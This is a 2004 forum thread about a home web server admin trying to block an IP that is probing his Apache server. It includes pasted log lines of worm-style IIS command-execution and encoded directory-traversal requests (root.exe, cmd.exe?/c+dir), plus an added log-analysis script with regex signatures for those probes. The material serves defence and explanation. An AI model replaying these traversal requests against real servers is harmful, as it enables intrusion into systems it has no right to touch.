finding out the MAC address through IP


  • finding out the MAC address through IP

    I have an issue with someone that keeps trying to hack me. I know their IP, it keeps coming up in Apache's logs all the time. But my router doesn't have IP block, only MAC address block. So how would I find someone else's MAC address through use of IP?
    BTW I tried pinging the IP, with no luck, Request timed out - error. I was thinking of a sniffer, but that would just give me the address of the router, right?
    Any help here would be appreciated.

  • #2
    i don't know about the MAC address, but you can at least trace the IP back to the ISP, then file a complaint with them. try using the tracert <IP> command from the command line

    EDIT: you could also try a whois lookup at arin.net. while it won't give you a MAC address it will give you some detailed information about the provider

    Comment


    • #3
      CCGetMAC can be used to get/find/get/lookup MAC address and Wake On LAN. It is a handy tool for finding MAC address and computer name from IP address.

      ^ that tool will let you find MAC from IP but i don't think you will be successful until you actually connect to the machine by way of ping or something like that but you can still try. since this person is sending "time out" while pinging then looks like he/she is running a firewall.
      Your Trusted Design and Construction Building Consultant | DCCS.TM

      ^ that is another site similar to what minibubba suggested.

      Comment


      • #4
        Originally posted by kane2g
        But my router doesn't have IP block, only MAC address block.
        Your router can only block MAC addresses that are connected through it.

        Comment


        • #5
          yeah, i figured that out :oops:
          but as I am thinking of using something like www.smoothwall.org for my firewall, rather than the router.
          guess the banning IPs will have to do.

          Comment


          • #6
            What do you mean, "will have to do" ? Hehe.... It's a flawless system.... 8)

            Comment


            • #7
              Well, just checking the logs everyday and making sure someone didn't just get a fresh IP. Banning a MAC would make it a lot easier. But oh-well. Tis a job of an admin I guess :wink:

              Comment


              • #8
                hmm: if you can make a connection of some sort to the machine you should be able to query the physical address [MAC address] with the ARP command like so.

                arp -a a.b.c.d

                where a.b.c.d is the ip address..

                Comment


                • #9
                  I just thought of something. How are they trying to hack you?

                  Comment


                  • #10
                    this is apache's access log


                    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
                    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
                    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
                    24.17.227.36 - - [19/Mar/2004:02:25:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489



                    here is error log

                    [Thu Mar 18 23:57:44 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida
                    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
                    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/MSADC
                    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/c
                    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/d
                    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
                    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_vti_bin
                    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_mem_bin
                    [Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/msadc
                    [Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
                    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
                    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
                    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
                    [Fri Mar 19 02:25:46 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
                    [Fri Mar 19 05:27:42 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida

                    i get similar errors from following IPs.

                    Whois tells me that most of them 67.x.x.x are Comcast :(

                    Comment


                    • #11
                      I think you'll find most of them are just viruses trying to spread. Blocking or not, you'll still get the traffic. As it's not doing anything, and there's not a lot you can do about it, just let it go.

                      What ports are you forwarding on your router? Just web/ftp, or did you do something silly like put your webserver in the DMZ?

                      Comment
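Added example, not part of any post in this thread: a short Python script that backs up the point in #11 by sorting access-log lines like those in #10 into probe types per source IP and listing any probe that received a non-error response. The request paths all target IIS on Windows rather than Apache; the signature list, the function names and the two log lines marked constructed are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Apache common log format: host ident user [time] "request" status bytes
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

# Request-path markers of the IIS-targeted scans shown in post #10 (assumed list).
SIGNATURES = [
    ("root.exe probe", re.compile(r"/root\.exe\?", re.I)),
    ("cmd.exe traversal probe", re.compile(r"/winnt/system32/cmd\.exe\?", re.I)),
    ("default.ida probe", re.compile(r"/default\.ida(\?|$)", re.I)),
]

def classify(path):
    """Return the label of the first matching signature, or None."""
    for label, rx in SIGNATURES:
        if rx.search(path):
            return label
    return None

def summarize(log_text):
    """Map source IP -> probe count, probe kinds, and probes answered with < 400."""
    report = defaultdict(lambda: {"probes": 0, "kinds": set(), "served": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ip, _method, path, status = m.groups()
        kind = classify(path)
        if kind is None:
            continue
        report[ip]["probes"] += 1
        report[ip]["kinds"].add(kind)
        if int(status) < 400:  # a 2xx/3xx answer to a probe needs a closer look
            report[ip]["served"].append(path)
    return dict(report)

# First four lines are taken from post #10; the last two are constructed.
SAMPLE_LOG = """\
24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
198.51.100.7 - - [19/Mar/2004:05:27:42 -0800] "GET /default.ida?XXXX HTTP/1.0" 404 489
192.0.2.10 - - [19/Mar/2004:06:00:00 -0800] "GET /index.html HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info["probes"], sorted(info["kinds"]), "served:", info["served"])
```

An empty `served` list for every IP, as with the 404 and 400 responses in #10, means none of the probes reached anything on the server.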


                      • #12
                        just forwarding the 80 port,
                        Decided against DMZ with your (i think) advice :D

                        Comment
